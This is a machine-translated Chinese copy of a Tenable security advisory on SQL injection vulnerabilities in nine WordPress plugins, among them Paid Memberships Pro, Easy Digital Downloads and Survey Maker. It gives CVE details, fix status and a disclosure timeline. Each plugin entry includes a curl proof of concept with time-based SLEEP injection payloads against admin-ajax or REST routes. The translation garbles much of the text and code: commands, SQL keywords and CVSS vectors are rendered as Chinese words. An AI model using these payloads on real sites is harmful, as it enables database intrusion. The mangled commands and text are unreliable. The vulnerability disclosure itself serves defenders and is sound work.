脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

SQL注入在多个WordPress插件

至关重要的

剧情简介

约书亚Martinelle站得住脚的研究发现多个SQL注入漏洞的WordPress插件。该顾问将跟踪每个漏洞信息和修复。


付费会员职业:cve - 2023 - 23488 -未经身份验证的SQL注入
参考:https://wordpress.org/plugins/paid-memberships-pro
影响版本:< 2.9.8
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:UI: N / N / S: U / C: H /我:H: H
CVSSv3分数:9.8

插件不逃避“代码”参数顺序/ pmpro / v1 /其他路线在SQL语句中使用它之前,导致未经过身份验证的SQL注入漏洞。

的概念:
TARGET_HOST是wordpress主机的地址和付费会员专业安装,下列概念证明使用睡眠功能演示SQL注入。改变的值传递给睡眠会改变请求需要多长时间返回。

旋度“http://TARGET_HOST/?rest_route=/pmpro/v1/order&code=a%27%20OR%20(选择% 20 201% % 20(选择(睡眠(2))))——% 20 -”

例如,运行这两次“时间”命令将显示响应时间的差异:

旋度”http://TARGET_HOST/?rest_route=/pmpro/v1/order&code=a%27%20OR%20(选择% 20 201% % 20(选择(睡眠(1))))——% 20——“{}真实用户m0.006s sys 0 0 m3.068s m0.009s时间旋度“http://TARGET_HOST/?rest_route=/pmpro/v1/order&code=a%27%20OR%20(选择% 20 201% % 20(选择(睡眠(2))))——% 20——“{}真正0 0 m0.006s sys 0 m0.009s m6.095s用户

简单的数字下载:cve - 2023 - 23489 -未经身份验证的SQL注入
参考:
https://wordpress.org/plugins/easy-digital-downloads/
影响版本:3.1.0.2 & 3.1.0.3
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:UI: N / N / S: U / C: H /我:H: H
CVSSv3分数:9.8

插件不逃避的s参数“edd_download_search”行动在SQL语句中使用它之前,导致未经过身份验证的SQL注入漏洞。
脆弱的部分代码对应于“edd_ajax_download_search()的函数。/ / ajax功能。php的文件。

的概念:
TARGET_HOST是wordpress主机的地址和付费会员专业安装,下列概念证明使用睡眠功能演示SQL注入。改变的值传递给睡眠会改变请求需要多长时间返回。

注意:相同的SQL注入/独特的请求不会连续两次工作,作为“edd_ajax_download_search()的函数存储最近搜索30秒(再次运行相同的负载,您将不得不修改负载或等待30秒)。

旋度“http://TARGET_HOST/wp-admin/admin-ajax.php?action=edd_download_search&s=1”+和+(选择+ 1 + +(选择(睡眠(2)))),+ - - - - - -”

调查公司:cve - 2023 - 23490 -验证SQL注入
参考:
https://wordpress.org/plugins/survey-maker
影响版本:< 3.1.2
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H
CVSSv3分数:8.8

插件不逃避的surveys_ids参数“ays_surveys_export_json”行动在SQL语句中使用它之前,导致身份验证SQL注入漏洞。

漏洞需要身份验证的攻击者,但不需要管理员权限,下面的示例使用一个帐户的用户的特权级别。

的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户。

旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php”——头“WP_COOKIE美元”——数据”action = ays_surveys_export_json&surveys_ids[0] = 1) +和+(选择+ 1 + +(选择(睡眠(3))))——+ - - - - - -”

ReviewX: cve - 2023 - 26325 -验证SQL注入
参考:
https://wordpress.org/plugins/reviewx/
影响版本:< = 1.6.6
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H
CVSSv3分数:8.8

插件没有逃脱“filterValue”或“selectedColumns”参数rx_export_review行动在SQL语句中使用它们之前,导致SQL注入。

漏洞需要身份验证的攻击者,但不需要管理员权限,下面的示例使用一个帐户的用户的特权级别。

的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户。

旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php”——头“WP_COOKIE美元”——数据”action = rx_export_review&filterValue [0] = &filterValue [1] = &filterValue [2] = &filterValue [3] = &filterValue [4] = all&filterValue [5] = &filterValue [6] = aaaa&filterValue [7] = id +和+(选择+ 1 + +(选择(睡眠(5))))&filterValue [8] = desc&selectedColumns [0] = id”

等待:一键式倒计时:cve - 2023 - 28659 -验证SQL注入
参考:
https://wordpress.org/plugins/waiting/
影响版本:< = 0.6.2
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H
CVSSv3分数:8.8

pbc_down(元)(id)参数的pbc_save_downs行动是容易受到SQL注入。

漏洞需要身份验证的攻击者,但不需要管理员权限,下面的示例使用一个帐户的用户的特权级别。

的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户。

旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php”——头“WP_COOKIE美元”——数据”action = pbc_save_downs&pbc_down(元)(id) = 1 +或+(选择+ 1 + +(选择(睡眠(1))))——“

事件很容易:cve - 2023 - 28660 -验证SQL注入
参考:
https://wordpress.org/plugins/events-made-easy/
影响版本:< = 2.3.14
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H
CVSSv3分数:8.8

插件不逃避的search_name的参数eme_recurrences_list行动之前使用它在一个SQL语句,导致SQL注入漏洞。

漏洞需要身份验证的攻击者,但不需要管理员权限,下面的示例使用一个帐户的用户的特权级别。

的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户。

旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax.php ? action = eme_recurrences_list&search_name = 1的{+}和{+}(选择+ 1 + +(选择(睡眠(0.5))))-{-}+{-}”——头“WP_COOKIE美元”

WP弹出横幅:cve - 2023 - 28661 -验证SQL注入
参考:
https://wordpress.org/plugins/wp-popup-banners/
影响版本:< = 1.2.5
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H
CVSSv3分数:8.8

插件不逃避的价值的参数get_popup_data行动之前使用它在一个SQL语句,导致SQL注入漏洞。

漏洞需要身份验证的攻击者,但不需要管理员权限,下面的示例使用一个帐户的用户的特权级别。

的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户。

旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php”——头“WP_COOKIE美元”——数据”行动= get_popup_data&value = 1 +和+(选择+ 1 + +(选择(睡眠(1))))”

礼品卡(礼券和包):cve - 2023 - 28662 -未经身份验证的SQL注入
参考:
https://wordpress.org/plugins/gift-voucher/
影响版本:< = 4.3.1
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:UI: N / N / S: U / C: H /我:H: H
CVSSv3分数:9.8

插件不逃避的模板的参数wpgv_doajax_voucher_pdf_save_func行动之前使用它在一个SQL语句,导致SQL注入漏洞。

触发漏洞不需要身份验证。

的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户,而美元BASE64_INJECTION base64编码的SQL注入,例如:
LTEgT1IgU0xFRVAoMik =翻译为1或睡眠(2)

旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php数据”——“行动= wpgv_doajax_voucher_pdf_save_func&template = $ BASE64_INJECTION "

或用一个合适的载荷:

旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php”——数据”行动= wpgv_doajax_voucher_pdf_save_func&template = LTEgT1IgU0xFRVAoMik =”


强大的PRO2PDF: cve - 2023 - 28663 -验证SQL注入
参考:
https://wordpress.org/plugins/formidablepro-2-pdf/
影响版本:< 3.11
CVSSv3向量:CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H
CVSSv3分数:8.8

插件不逃避的fieldmap的参数fpropdf_export_file行动之前使用它在一个SQL语句,导致SQL注入漏洞。

漏洞需要身份验证的攻击者,但不需要管理员权限,下面的示例使用一个帐户的用户的特权级别。

的概念:
一个简单的可以使用curl命令演示这个问题(尽管它需要一个有效的/当前WP会话cookie)。在下面的概念验证中,替换与目标wordpress实例TARGET_HOST美元,美元WP_COOKIE与完整的饼干头(即。“饼干:wordpress_xyz…”)登录WP用户。

旋度“http:// TARGET_HOST美元/ wp-admin / admin-ajax。php”——头“WP_COOKIE美元”——数据”行动= fpropdf_export_file&fieldmap = 1 +和+(选择+ 1 + +(选择(睡眠(1))))”

解决方案

固定

成为付费会员职业:在版本2.9.8固定

简单的数字下载:固定在版本3.1.0.4

调查公司:固定在版本3.1.2

强大的PRO2PDF:固定在3.11版本

不固定的

等待:一键式倒计时不固定的(插件关闭截止2022年12月19日)

事件很容易:不固定的(插件关闭截止2022年12月19日)

WP弹出横幅:不固定的(插件关闭截止2022年12月19日)

礼品卡:不固定的

ReviewX:不固定的

披露时间表

2022年12月19日——报告问题WordPress
2022年12月20 - WordPress承认报告
2022年12月21日——在3.1.2调查制造商发布的修复
2022年12月27日——成为付费会员专业修复2.9.8释放
2023年1月5 -简单的数字下载修复3.1.0.4释放
2023年1月26日检查修复1.6.4,释放
3月20日披露日期2023 - 90天

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
交易- 2023 - 2
信贷
约书亚Martinelle
CVSSv3基地/时间的分数
9.8
8.8
CVSSv3向量
CVSS: 3.1 / AV: N /交流:L /公关:UI: N / N / S: U / C: H /我:H: H
CVSS: 3.1 / AV: N /交流:L /公关:L / UI: N / S: U / C: H /我:H: H
受影响的产品
成为付费会员Pro WordPress插件
简单的数字下载WordPress插件
调查制造商WordPress插件
Reviewx WordPress插件
等待:一键式倒计时WordPress插件
事件做出简单的WordPress插件
WP弹出横幅WordPress插件
礼品卡(礼券和包)WordPress插件
强大的PRO2PDF WordPress插件
风险因素
至关重要的

咨询时间

2023年1月12日——咨询发表
2023年1月16日,纠正影响版本,便于数字下载
2023年2月22日-添加cve - 2023 - 26325
2023年3月20日添加多个cf
2023年4月12日——纠正ReviewX影响/固定的版本和概念证明
2023年7月5日固定的礼品卡证明概念,强大的PRO2PDF参考

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map